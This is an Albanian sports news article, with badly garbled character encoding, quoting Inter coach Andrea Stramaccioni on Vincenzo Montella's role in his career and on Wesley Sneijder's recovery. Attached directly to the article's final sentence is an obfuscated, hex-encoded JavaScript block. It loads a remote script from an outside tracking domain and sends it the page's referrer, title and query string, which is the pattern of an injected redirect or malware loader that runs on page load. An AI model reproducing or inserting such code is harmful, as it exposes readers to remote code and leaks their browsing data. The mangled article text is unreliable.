f1_07-strama-jpg1352307095

Strama: Menaxheri im A�shtA� Montella

Andrea Stramaccioni ka treguar disa detaje pikante nA� lidhje me rrugA�n qA� ai ka bA�rA� deri tani nA� stolin e Interit. KA�to kujtime, trajneri i Interit i ka bA�rA� nA� emisionin e ditA�s sA� hA�nA�, a�?Undicia�?, duke rrA�fyer se ai qA� e kA�shilloi tA� mos vononte qA� tA� pranonte ofertA�n e presidentit tA� Interit, Massimo Morattit ishte trajneri aktual i FiorentinA�s.

a�?UnA� dhe Vincenzo Montella jemi njohur qA� nA� kohA�n kur drejtoja tA� rinjtA� e RomA�s dhe ai skuadrA�n e parA�. TA� dy sA� bashku lidhA�m njA� marrA�dhA�nie tA� fortA�, sepse Vincenzco ishte ai qA� mA� ka qA�ndruar mA� pranA� se kushdo tjetA�r nA� hapat e parA� tA� karrierA�s sime nA� RomA�.

Dhe, duke qenA� se ishim shumA� tA� lidhur, momentin e parA� qA� mora telefonatA�n e Massimo Morattit pA�r ta��u transferuar tek Interi, Montella ishte i pari qA� e mori vesh lajmin dhe nA� tA� njA�jtA�n kohA� mA� kA�shilloi qA� tA� pranoja.

Me pak fjalA�, ai ka luajtur rolin e menaxherit tim, ai A�shtA� menaxheri im i zemrA�s dhe unA� e vlerA�soj shumA�a�?,A� nA�nvizoi Andrea Stramaccioni, i cili mA� pas shprehu edhe ankthin e tij pA�r rikuperimin e Wesley Sneijderit: Uesli po stA�rvitet dhe ndoshta mund tA� jetA� gati pA�r ndeshjen nA� Bergamo.

Gjithsesi, duke qenA� se koha e rikuperimit tA� tij u zgjat edhe mA� shumA�, nuk do ta rrezikoj nA�se nuk do tA� jetA� nA� 100 pA�r qind, sepse pA�r sfidA�n me Cagliarin jam i bindur qA� do tA� jetA� nA� formA�n perfektea�?.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}